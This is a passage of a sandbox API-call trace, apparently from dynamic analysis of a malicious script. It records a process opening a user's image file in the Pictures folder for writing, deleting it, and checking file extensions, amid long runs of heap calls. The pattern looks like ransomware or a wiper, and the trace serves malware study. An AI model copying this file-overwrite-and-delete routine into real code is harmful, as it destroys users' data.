cchLength=0xb | out: lpsz="byte[32986]") returned 0xb [0188.943] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0188.943] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0188.943] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0188.943] FreeLibrary (hLibModule=0x75c90000) returned 1 [0188.943] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0188.944] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0188.944] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.944] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\6t126znrjjemieiaf23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0188.944] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.944] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.944] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.944] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.945] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.945] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.945] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.945] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.945] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFilePart=0x0) returned 0x5c [0188.945] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x15d8e200, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0x90ae18 [0188.946] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\6t126znRJjEMIeiAF23.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\6t126znrjjemieiaf23.bmp")) returned 1 [0188.948] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8590c70, ftCreationTime.dwHighDateTime=0x1d5dd57, ftLastAccessTime.dwLowDateTime=0x1dee4310, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x15d8e200, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x80da, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="6t126znRJjEMIeiAF23.bmp", cAlternateFileName="6T126Z~1.BMP")) returned 0 [0188.948] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.951] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0188.952] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.952] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0188.953] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.954] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0188.954] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.954] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.955] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0188.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1aa0 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0188.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0188.959] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.960] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0188.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.960] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.961] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.963] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0188.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0188.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0188.964] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 